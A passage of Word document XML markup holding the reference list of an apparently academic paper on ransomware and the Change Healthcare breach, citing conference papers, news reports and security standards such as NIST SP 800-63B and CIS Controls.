      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] M. Aggarwal, "Ransomware Attack: An Evolving Targeted Threat," 2023 14th International </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Conference on Computing Communication and Networking Technologies (ICCCNT), IIT </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Delhi, India, 2023, pp. 1-6, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>doi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 10.1109/ICCCNT56998.2023.10308249</w:t>
      </w:r>
      <w:r w:rsidR="003E2F7B" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2F7B" w:rsidRPr="00C57BFC" w:rsidRDefault="003E2F7B" w:rsidP="003468ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] IBM Security and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ponemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Institute, "Cost of a Data Breach Report 2024," IBM Security, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004031B7" w:rsidRPr="00C57BFC" w:rsidRDefault="00813C49" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] S. M. S. Bukhari et al., "A Survey of Ransomware Attacks for Healthcare Systems: Risks, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Challenges, Solutions and Opportunity of Research," 2021 1st International Conference on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Artificial Intelligence and Data Analytics (CAIDA), Riyadh, Saudi Arabia, 2021, pp. 98-103, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>doi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 10.1109/CAIDA51941.2021.9509877.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242C62" w:rsidRPr="00C57BFC" w:rsidRDefault="00242C62" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidR="006C589F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.hipaajournal.com/change-healthcare-responding-to-cyberattack/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D1F6F" w:rsidRPr="00C57BFC" w:rsidRDefault="00AF5FD8" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidR="000A0A5F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reuters story on breach notification (June 20, 2024) and AP piece on MFA/no-MFA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005129F6" w:rsidRPr="00C57BFC" w:rsidRDefault="006D1F6F" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] “Change Healthcare breached via Citrix portal with no MFA,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TechTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Arielle </w:t>
      </w:r>
      <w:r w:rsidR="006D29D7" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Waldman), Apr. 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00922BEB" w:rsidRPr="00C57BFC" w:rsidRDefault="005129F6" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] S. A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Almuhaideb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and N. F. F. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alsubaei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, "Security against Ransomware Attack in Medical </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Healthcare Records Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blockchain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technology," 2023 1st International Conference on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Advanced Innovations in Smart Cities (ICAISC), Jeddah, Saudi Arabia, 2023, pp. 1-6, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>doi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      10.1109/ICAISC56366.2023.10145717</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653488" w:rsidRPr="00C57BFC" w:rsidRDefault="00011960" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidR="00653488" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.kaspersky.com/blog/unitedhealth-ransomware-attack/53065/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008B1983" w:rsidRPr="00C57BFC" w:rsidRDefault="00011960" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[10</w:t>
      </w:r>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacroPraxis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Research Institute, </w:t>
      </w:r>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“Turn Back Time (TBT) – Breach Analysis – Change </w:t>
      </w:r>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       Healthcare”</w:t>
      </w:r>
      <w:r w:rsidR="00B859F3" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12822" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Healthcare Dive. “UnitedHealth CEO details Change Healthcare attack, cites MFA gap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2FB1" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[12</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">NIST SP 800-63B. </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Digital Identity Guidelines.</w:t>
      </w:r>
      <w:r w:rsidR="00B46232" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidR="000D2FB1" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B46232" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1983" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[13</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">CISA. </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Zero Trust Maturity Model.</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidR="00745E21" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cisa.gov/zero-trust-maturity-model</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008B1983" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[14</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">Center for Internet Security. </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>CIS Controls v8.</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00646B85" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidR="00646B85" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cisecurity.org/controls/cis-controls-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008B1983" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[15</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> PCI Security Standards Council. </w:t>
      </w:r>
      <w:r w:rsidR="008B1983" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>PCI-DSS 4.0.</w:t>
      </w:r>
      <w:r w:rsidR="00646B85" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidR="00646B85" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.pcisecuritystandards.org/standards/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EF008F" w:rsidRPr="00C57BFC" w:rsidRDefault="00A12822" w:rsidP="00EF008F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[16</w:t>
      </w:r>
      <w:r w:rsidR="00EF008F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00EF008F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Cybersecurity Dive. “Change Healthcare breach: Compromised credentials exploited MFA </w:t>
      </w:r>
      <w:r w:rsidR="00EF008F" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        absence.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C4CD7" w:rsidRPr="00C57BFC" w:rsidRDefault="00273E86" w:rsidP="00A12822">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[17</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Microsoft Security Blog. “One simple action you can take to prevent 99.9% of account </w:t>
      </w:r>
      <w:r w:rsidR="00A12822" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00AD3F2D" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A12822" w:rsidRPr="00C57BFC">
        <w:t>attacks.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C4CD7" w:rsidRPr="00C57BFC" w:rsidRDefault="00273E86" w:rsidP="00A12822">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[18</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Microsoft Research. “How effective is multi-factor authentication at deterring </w:t>
      </w:r>
      <w:r w:rsidR="00A12822" w:rsidRPr="00C57BFC">
